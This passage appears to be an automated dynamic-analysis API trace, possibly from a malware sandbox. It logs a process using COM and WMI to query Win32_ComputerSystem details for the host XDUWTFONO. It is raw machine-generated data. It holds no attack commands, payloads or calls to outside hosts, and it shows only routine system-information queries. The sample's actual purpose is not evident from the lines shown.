	[0201.465] IClientSecurity:QueryBlanket (in: This=0x1c836190, pProxy=0x1c836188, pAuthnSvc=0x1c80cc50, pAuthzSvc=0x1c80cc4c, pServerPrincName=0x1c80cc78, pAuthnLevel=0x1c80cc48, pImpLevel=0x1c80cc64, pAuthInfo=0x1c80cc88, pCapabilites=0x1c80cc60 | out: pAuthnSvc=0x1c80cc50*=0xa, pAuthzSvc=0x1c80cc4c*=0x0, pServerPrincName=0x1c80cc78, pAuthnLevel=0x1c80cc48*=0x6, pImpLevel=0x1c80cc64*=0x2, pAuthInfo=0x1c80cc88, pCapabilites=0x1c80cc60*=0x1) returned 0x0
	[0201.465] IUnknown:Release (This=0x1c836190) returned 0x1
	[0201.465] IUnknown:QueryInterface (in: This=0x1c836188, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cbf8 | out: ppvObject=0x1c80cbf8*=0x1b807cb0) returned 0x0
	[0201.465] IUnknown:QueryInterface (in: This=0x1c836188, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cb88 | out: ppvObject=0x1c80cb88*=0x1c836190) returned 0x0
	[0201.466] IClientSecurity:SetBlanket (This=0x1c836190, pProxy=0x1c836188, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0201.468] IUnknown:Release (This=0x1c836190) returned 0x2
	[0201.468] WbemLocator:IUnknown:Release (This=0x1b807cb0) returned 0x1
	[0201.468] CoTaskMemFree (pv=0x1b81e8c0) 
	[0201.468] IUnknown:QueryInterface (in: This=0x1c836188, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c830 | out: ppvObject=0x1c80c830*=0x1b807cb0) returned 0x0
	[0201.469] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807cb0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c8b0 | out: ppvObject=0x1c80c8b0*=0x0) returned 0x80004002
	[0201.469] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807cb0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c648 | out: ppvObject=0x1c80c648*=0x0) returned 0x80004002
	[0201.471] WbemLocator:IUnknown:AddRef (This=0x1b807cb0) returned 0x3
	[0201.471] CoGetContextToken (in: pToken=0x1c80c500 | out: pToken=0x1c80c500) returned 0x0
	[0201.471] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807cb0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c4c0 | out: ppvObject=0x1c80c4c0*=0x1b807b98) returned 0x0
	[0201.471] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b807b98, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c4f0 | out: pCid=0x1c80c4f0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0201.471] WbemLocator:IUnknown:Release (This=0x1b807b98) returned 0x3
	[0201.471] CoGetContextToken (in: pToken=0x1c80c4d0 | out: pToken=0x1c80c4d0) returned 0x0
	[0201.471] WbemLocator:IUnknown:AddRef (This=0x1b807cb0) returned 0x4
	[0201.471] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807cb0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c5e8 | out: ppvObject=0x1c80c5e8*=0x1b807c80) returned 0x0
	[0201.472] WbemLocator:IUnknown:Release (This=0x1b807cb0) returned 0x4
	[0201.472] WbemLocator:IRpcOptions:Query (in: This=0x1b807c80, pPrx=0x1b807cb0, dwProperty=2, pdwValue=0x1c80c658 | out: pdwValue=0x1c80c658) returned 0x80004002
	[0201.472] WbemLocator:IUnknown:Release (This=0x1b807c80) returned 0x3
	[0201.472] WbemLocator:IUnknown:Release (This=0x1b807cb0) returned 0x2
	[0201.472] CoGetContextToken (in: pToken=0x1c80c9d0 | out: pToken=0x1c80c9d0) returned 0x0
	[0201.472] CoGetContextToken (in: pToken=0x1c80c910 | out: pToken=0x1c80c910) returned 0x0
	[0201.472] WbemLocator:IUnknown:AddRef (This=0x1b807cb0) returned 0x3
	[0201.472] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807cb0, riid=0x1c80ca50*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80ca30 | out: ppvObject=0x1c80ca30*=0x1c836188) returned 0x0
	[0201.473] WbemLocator:IUnknown:Release (This=0x1b807cb0) returned 0x3
	[0201.473] IUnknown:Release (This=0x1c836188) returned 0x2
	[0201.473] IUnknown:Release (This=0x1c836188) returned 0x1
	[0201.473] WbemLocator:IUnknown:Release (This=0x1c83aad8) returned 0x2
	[0201.473] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c835ba0, puCount=0x1c80cff0 | out: puCount=0x1c80cff0*=0x2) returned 0x0
	[0201.473] WbemDefPath:IWbemPath:GetText (in: This=0x1c835ba0, lFlags=4, puBuffLength=0x1c80cff0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80cff0*=0x17, pszText=0x0) returned 0x0
	[0201.474] WbemDefPath:IWbemPath:GetText (in: This=0x1c835ba0, lFlags=4, puBuffLength=0x1c80cff0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80cff0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0201.474] CoGetContextToken (in: pToken=0x1c80cbf0 | out: pToken=0x1c80cbf0) returned 0x0
	[0201.474] CoGetContextToken (in: pToken=0x1c80cb30 | out: pToken=0x1c80cb30) returned 0x0
	[0201.474] WbemLocator:IUnknown:AddRef (This=0x1b807cb0) returned 0x2
	[0201.474] WbemLocator:IUnknown:QueryInterface (in: This=0x1b807cb0, riid=0x1c80cc70*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80cc50 | out: ppvObject=0x1c80cc50*=0x1c836188) returned 0x0
	[0201.474] WbemLocator:IUnknown:Release (This=0x1b807cb0) returned 0x2
	[0201.474] IUnknown:AddRef (This=0x1c836188) returned 0x3
	[0201.474] IEnumWbemClassObject:Clone (in: This=0x1c836188, ppEnum=0x1c80d0b0 | out: ppEnum=0x1c80d0b0*=0x1c83ddb8) returned 0x0
	[0201.476] IUnknown:QueryInterface (in: This=0x1c83ddb8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cd08 | out: ppvObject=0x1c80cd08*=0x1c83ddc0) returned 0x0
	[0201.476] IClientSecurity:QueryBlanket (in: This=0x1c83ddc0, pProxy=0x1c83ddb8, pAuthnSvc=0x1c80cd00, pAuthzSvc=0x1c80ccfc, pServerPrincName=0x1c80cd28, pAuthnLevel=0x1c80ccf8, pImpLevel=0x1c80cd14, pAuthInfo=0x1c80cd38, pCapabilites=0x1c80cd10 | out: pAuthnSvc=0x1c80cd00*=0xa, pAuthzSvc=0x1c80ccfc*=0x0, pServerPrincName=0x1c80cd28, pAuthnLevel=0x1c80ccf8*=0x6, pImpLevel=0x1c80cd14*=0x2, pAuthInfo=0x1c80cd38, pCapabilites=0x1c80cd10*=0x1) returned 0x0
	[0201.476] IUnknown:Release (This=0x1c83ddc0) returned 0x1
	[0201.476] IUnknown:QueryInterface (in: This=0x1c83ddb8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cca8 | out: ppvObject=0x1c80cca8*=0x1b808130) returned 0x0
	[0201.476] IUnknown:QueryInterface (in: This=0x1c83ddb8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cc38 | out: ppvObject=0x1c80cc38*=0x1c83ddc0) returned 0x0
	[0201.477] IClientSecurity:SetBlanket (This=0x1c83ddc0, pProxy=0x1c83ddb8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0201.622] IUnknown:Release (This=0x1c83ddc0) returned 0x2
	[0201.622] WbemLocator:IUnknown:Release (This=0x1b808130) returned 0x1
	[0201.622] CoTaskMemFree (pv=0x1b81e7a0) 
	[0201.622] IUnknown:QueryInterface (in: This=0x1c83ddb8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c8d0 | out: ppvObject=0x1c80c8d0*=0x1b808130) returned 0x0
	[0201.623] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808130, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c950 | out: ppvObject=0x1c80c950*=0x0) returned 0x80004002
	[0201.772] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808130, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c6e8 | out: ppvObject=0x1c80c6e8*=0x0) returned 0x80004002
	[0201.773] WbemLocator:IUnknown:AddRef (This=0x1b808130) returned 0x3
	[0201.774] CoGetContextToken (in: pToken=0x1c80c5a0 | out: pToken=0x1c80c5a0) returned 0x0
	[0201.774] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808130, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c560 | out: ppvObject=0x1c80c560*=0x1b808018) returned 0x0
	[0201.774] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b808018, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c590 | out: pCid=0x1c80c590*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0201.774] WbemLocator:IUnknown:Release (This=0x1b808018) returned 0x3
	[0201.774] CoGetContextToken (in: pToken=0x1c80c570 | out: pToken=0x1c80c570) returned 0x0
	[0201.774] WbemLocator:IUnknown:AddRef (This=0x1b808130) returned 0x4
	[0201.774] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808130, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c688 | out: ppvObject=0x1c80c688*=0x1b808100) returned 0x0
	[0201.775] WbemLocator:IUnknown:Release (This=0x1b808130) returned 0x4
	[0201.775] WbemLocator:IRpcOptions:Query (in: This=0x1b808100, pPrx=0x1b808130, dwProperty=2, pdwValue=0x1c80c6f8 | out: pdwValue=0x1c80c6f8) returned 0x80004002
	[0201.775] WbemLocator:IUnknown:Release (This=0x1b808100) returned 0x3
	[0201.775] WbemLocator:IUnknown:Release (This=0x1b808130) returned 0x2
	[0201.775] CoGetContextToken (in: pToken=0x1c80ca70 | out: pToken=0x1c80ca70) returned 0x0
	[0201.775] CoGetContextToken (in: pToken=0x1c80c9b0 | out: pToken=0x1c80c9b0) returned 0x0
	[0201.775] WbemLocator:IUnknown:AddRef (This=0x1b808130) returned 0x3
	[0201.775] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808130, riid=0x1c80caf0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80cad0 | out: ppvObject=0x1c80cad0*=0x1c83ddb8) returned 0x0
	[0201.775] WbemLocator:IUnknown:Release (This=0x1b808130) returned 0x3
	[0201.776] IUnknown:Release (This=0x1c83ddb8) returned 0x2
	[0201.776] IUnknown:Release (This=0x1c83ddb8) returned 0x1
	[0201.776] IUnknown:Release (This=0x1c836188) returned 0x2
	[0201.776] CoGetContextToken (in: pToken=0x1c80ce70 | out: pToken=0x1c80ce70) returned 0x0
	[0201.776] CoGetContextToken (in: pToken=0x1c80cdb0 | out: pToken=0x1c80cdb0) returned 0x0
	[0201.776] WbemLocator:IUnknown:AddRef (This=0x1b808130) returned 0x2
	[0201.776] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808130, riid=0x1c80cef0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80ced0 | out: ppvObject=0x1c80ced0*=0x1c83ddb8) returned 0x0
	[0201.776] WbemLocator:IUnknown:Release (This=0x1b808130) returned 0x2
	[0201.776] IUnknown:AddRef (This=0x1c83ddb8) returned 0x3
	[0201.776] IEnumWbemClassObject:Reset (This=0x1c83ddb8) returned 0x0
	[0201.778] IUnknown:Release (This=0x1c83ddb8) returned 0x2
	[0201.778] CoTaskMemAlloc (cb=0x8) returned 0x1b804e50
	[0201.778] IEnumWbemClassObject:Next (in: This=0x1c83ddb8, lTimeout=-1, uCount=0x1, apObjects=0x1b804e50, puReturned=0x1c80d0f8 | out: apObjects=0x1b804e50*=0x1c83de20, puReturned=0x1c80d0f8*=0x1) returned 0x0
	[0201.782] IUnknown:QueryInterface (in: This=0x1c83de20, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c420 | out: ppvObject=0x1c80c420*=0x1c83de20) returned 0x0
	[0201.782] IUnknown:QueryInterface (in: This=0x1c83de20, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c4a0 | out: ppvObject=0x1c80c4a0*=0x0) returned 0x80004002
	[0201.782] IUnknown:QueryInterface (in: This=0x1c83de20, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c238 | out: ppvObject=0x1c80c238*=0x0) returned 0x80004002
	[0201.783] IUnknown:AddRef (This=0x1c83de20) returned 0x3
	[0201.783] CoGetContextToken (in: pToken=0x1c80c0f0 | out: pToken=0x1c80c0f0) returned 0x0
	[0201.783] IUnknown:QueryInterface (in: This=0x1c83de20, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c0b0 | out: ppvObject=0x1c80c0b0*=0x1c83de28) returned 0x0
	[0201.783] IMarshal:GetUnmarshalClass (in: This=0x1c83de28, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c0e0 | out: pCid=0x1c80c0e0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0201.783] IUnknown:Release (This=0x1c83de28) returned 0x3
	[0201.783] CoGetContextToken (in: pToken=0x1c80c0c0 | out: pToken=0x1c80c0c0) returned 0x0
	[0201.783] IUnknown:AddRef (This=0x1c83de20) returned 0x4
	[0201.783] IUnknown:QueryInterface (in: This=0x1c83de20, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c1d8 | out: ppvObject=0x1c80c1d8*=0x0) returned 0x80004002
	[0201.784] IUnknown:Release (This=0x1c83de20) returned 0x3
	[0201.784] IUnknown:Release (This=0x1c83de20) returned 0x2
	[0201.784] CoGetContextToken (in: pToken=0x1c80c580 | out: pToken=0x1c80c580) returned 0x0
	[0201.784] CoGetContextToken (in: pToken=0x1c80c4c0 | out: pToken=0x1c80c4c0) returned 0x0
	[0201.784] IUnknown:AddRef (This=0x1c83de20) returned 0x3
	[0201.784] IUnknown:QueryInterface (in: This=0x1c83de20, riid=0x1c80c600*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c80c5e0 | out: ppvObject=0x1c80c5e0*=0x1c83de20) returned 0x0
	[0201.785] IUnknown:Release (This=0x1c83de20) returned 0x3
	[0201.785] IUnknown:Release (This=0x1c83de20) returned 0x2
	[0201.785] IUnknown:Release (This=0x1c83de20) returned 0x1
	[0201.785] CoTaskMemFree (pv=0x1b804e50) 
	[0201.785] CoGetContextToken (in: pToken=0x1c80cf00 | out: pToken=0x1c80cf00) returned 0x0
	[0201.785] IUnknown:AddRef (This=0x1c83de20) returned 0x2
	[0201.786] IWbemClassObject:Get (in: This=0x1c83de20, wszName="__GENUS", lFlags=0, pVal=0x1c80d070*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d06c*=0, plFlavor=0x1c80d068*=0 | out: pVal=0x1c80d070*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c80d06c*=3, plFlavor=0x1c80d068*=64) returned 0x0
	[0201.786] IWbemClassObject:Get (in: This=0x1c83de20, wszName="__PATH", lFlags=0, pVal=0x1c80d010*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c80d00c*=0, plFlavor=0x1c80d008*=0 | out: pVal=0x1c80d010*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c80d00c*=8, plFlavor=0x1c80d008*=64) returned 0x0
	[0201.786] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0201.786] CoGetObjectContext (in: riid=0x1c80cfa8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cfa0 | out: ppv=0x1c80cfa0*=0x181868) returned 0x0
	[0201.786] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80cfc0 | out: pAptType=0x1c80cfc0*=1) returned 0x0
	[0201.786] IUnknown:QueryInterface (in: This=0x181868, riid=0x303e038*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d0c8 | out: ppvObject=0x1c80d0c8*=0x0) returned 0x80004002
	[0201.786] IUnknown:Release (This=0x181868) returned 0x1
	[0201.798] CoGetClassObject (in: rclsid=0x1b802378*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80c630 | out: ppv=0x1c80c630*=0x1c831c20) returned 0x0
	[0201.799] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c831c20, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c340 | out: ppvObject=0x1c80c340*=0x0) returned 0x80004002
	[0201.799] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c831c20, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c328 | out: ppvObject=0x1c80c328*=0x1c8405f0) returned 0x0
	[0201.799] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8405f0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c230 | out: ppvObject=0x1c80c230*=0x1c8405f0) returned 0x0
	[0201.799] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8405f0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c2b0 | out: ppvObject=0x1c80c2b0*=0x0) returned 0x80004002
	[0201.800] WbemDefPath:IUnknown:AddRef (This=0x1c8405f0) returned 0x3
	[0201.800] CoGetContextToken (in: pToken=0x1c80bf00 | out: pToken=0x1c80bf00) returned 0x0
	[0201.800] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8405f0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bec0 | out: ppvObject=0x1c80bec0*=0x1b82a970) returned 0x0
	[0201.800] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b82a970, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80bef0 | out: pCid=0x1c80bef0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0201.800] WbemDefPath:IUnknown:Release (This=0x1b82a970) returned 0x3
	[0201.800] CoGetContextToken (in: pToken=0x1c80bed0 | out: pToken=0x1c80bed0) returned 0x0
	[0201.800] WbemDefPath:IUnknown:AddRef (This=0x1c8405f0) returned 0x4
	[0201.800] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8405f0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bfe8 | out: ppvObject=0x1c80bfe8*=0x0) returned 0x80004002
	[0201.800] WbemDefPath:IUnknown:Release (This=0x1c8405f0) returned 0x3
	[0201.800] WbemDefPath:IUnknown:Release (This=0x1c8405f0) returned 0x2
	[0201.801] WbemDefPath:IUnknown:Release (This=0x1c831c20) returned 0x0
	[0201.801] WbemDefPath:IUnknown:Release (This=0x1c8405f0) returned 0x1
	[0201.801] CoGetContextToken (in: pToken=0x1c80cc00 | out: pToken=0x1c80cc00) returned 0x0
	[0201.801] CoGetContextToken (in: pToken=0x1c80cb40 | out: pToken=0x1c80cb40) returned 0x0
	[0201.801] WbemDefPath:IUnknown:AddRef (This=0x1c8405f0) returned 0x2
	[0201.801] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8405f0, riid=0x1c80cc80*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80cc60 | out: ppvObject=0x1c80cc60*=0x1c8405f0) returned 0x0
	[0201.801] WbemDefPath:IUnknown:Release (This=0x1c8405f0) returned 0x2
	[0201.801] WbemDefPath:IUnknown:Release (This=0x1c8405f0) returned 0x1
	[0201.801] CoGetContextToken (in: pToken=0x1c80cd80 | out: pToken=0x1c80cd80) returned 0x0
	[0201.801] CoGetContextToken (in: pToken=0x1c80ccc0 | out: pToken=0x1c80ccc0) returned 0x0
	[0201.801] WbemDefPath:IUnknown:AddRef (This=0x1c8405f0) returned 0x2
	[0201.802] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8405f0, riid=0x1c80ce00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80cde0 | out: ppvObject=0x1c80cde0*=0x1c8405f0) returned 0x0
	[0201.802] WbemDefPath:IUnknown:Release (This=0x1c8405f0) returned 0x2
	[0201.802] WbemDefPath:IUnknown:AddRef (This=0x1c8405f0) returned 0x3
	[0201.802] WbemDefPath:IWbemPath:SetText (This=0x1c8405f0, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x0
	[0201.802] WbemDefPath:IUnknown:Release (This=0x1c8405f0) returned 0x2
	[0201.802] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c835ba0, puCount=0x1c80d040 | out: puCount=0x1c80d040*=0x2) returned 0x0
	[0201.802] WbemDefPath:IWbemPath:GetText (in: This=0x1c835ba0, lFlags=4, puBuffLength=0x1c80d040*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d040*=0x17, pszText=0x0) returned 0x0
